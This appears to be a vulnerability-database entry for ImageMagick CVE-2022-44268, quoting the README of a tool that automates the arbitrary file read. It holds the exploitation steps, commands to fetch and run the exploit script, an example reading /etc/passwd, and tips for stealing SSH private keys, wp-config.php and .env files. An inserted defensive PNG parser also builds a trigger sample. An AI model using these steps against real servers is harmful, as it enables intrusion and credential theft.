Associated Vulnerability
Title: ImageMagick security vulnerability (CVE-2022-44268)
Description: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary file (if the magick binary has permissions to read it).
Description
Automating Exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read
Readme
# auto-cve-2022-44268

Automating exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read
Original finding: https://www.metabaseq.com/imagemagick-zero-days/
PoC Repository: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
# Description
ImageMagick will **interpret the "profile" text string as a filename** and **load its content** as a raw profile; **the attacker can then download** the resized image, **which comes with the content of a remote file.**
## Vulnerability & Exploitation summary
🔴 Take a PNG file, add a file path to the "profile" EXIF field, and send it to a website running an affected version of ImageMagick. ImageMagick interprets the file path and loads its content into the EXIF field; you download the resized image, extract the hex data in the "Raw Profile Type" field, and convert it to ASCII to read the remote file.
Affected versions: ImageMagick 7.1.0-49
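As an added defender-side check (not code from this tool or its repository): a Python parser that walks a PNG's chunk list and reports every tEXt, zTXt or iTXt chunk keyed "profile", the field the vulnerable PNG coder treats as a filename, so an upload can be inspected before ImageMagick processes it. The 1x1 sample PNG and the path in it are constructed here; that ImageMagick matches the keyword case-insensitively is my assumption.

```python
import struct
import zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}

def chunk(ctype, data):
    # Serialize one PNG chunk: 4-byte big-endian length, type, data, CRC32 over type + data.
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

def iter_chunks(png):
    # Walk the chunk list, checking the signature and every CRC (a corrupt chunk is an error, not skipped).
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length

def text_value(ctype, rest):
    # Recover the text payload that follows "keyword\0" in a tEXt, zTXt or iTXt chunk.
    if ctype == b"tEXt":
        return rest
    if ctype == b"zTXt":
        return zlib.decompress(rest[1:])  # rest[0] is the compression method
    flag = rest[0]  # iTXt: compression flag, method, language\0, translated keyword\0, text
    _lang, _translated, text = rest[2:].split(b"\x00", 2)
    return zlib.decompress(text) if flag else text

def find_profile_chunks(png):
    # (chunk type, value) for every text chunk keyed "profile", the field the vulnerable PNG
    # coder interprets as a filename; keyword match is case-insensitive (assumed to mirror ImageMagick).
    hits = []
    for ctype, data in iter_chunks(png):
        if ctype in TEXT_CHUNKS:
            keyword, _, rest = data.partition(b"\x00")
            if keyword.lower() == b"profile":
                hits.append((ctype.decode("ascii"), text_value(ctype, rest)))
    return hits

def build_sample_png(extra_chunks):
    # Constructed 1x1 RGB PNG carrying the given extra chunks (sample input, not a real upload).
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one RGB pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + b"".join(extra_chunks) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")

SUSPICIOUS = build_sample_png([chunk(b"tEXt", b"profile\x00/etc/passwd")])  # constructed trigger sample
```

Any non-empty result from find_profile_chunks is a reason to reject the upload or quarantine it for review; a benign image has no reason to carry a "profile" text chunk.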
# Requirements
```bash
sudo apt install pngcrush imagemagick exiftool exiv2 -y
```
# Usage
```bash
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
```
# Example
```bash
./auto-cve-2022-44268.sh flag.png /etc/passwd
```
# Demo
https://github.com/narekkay/autoexploit-cve-2022-44268/assets/24856100/cd5719e5-6eae-4544-b4dc-719b1182018d
# Enumeration Tips
Once you get users from /etc/passwd, try to enumerate SSH private keys from /home/<user>/.ssh/:
- id_rsa
- id_ecdsa
- id_ed25519
e.g. /home/john/.ssh/id_ed25519
Don't forget:
- config files for known CMS, like wp-config.php for WordPress
- virtual host enumeration, like /etc/apache2/sites-available/000-default.conf
- or .env files for instances
### Tags
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268
File Snapshot
[4.0K] /data/pocs/7f802fbbccf5ae457c451319e2887bcd89636c69
├── [1.6K] auto-cve-2022-44268.sh
├── [101K] banner.png
├── [5.5M] demo_auto-cve-2022-44268.mp4
├── [1.2K] flag.png
└── [2.0K] README.md
0 directories, 5 files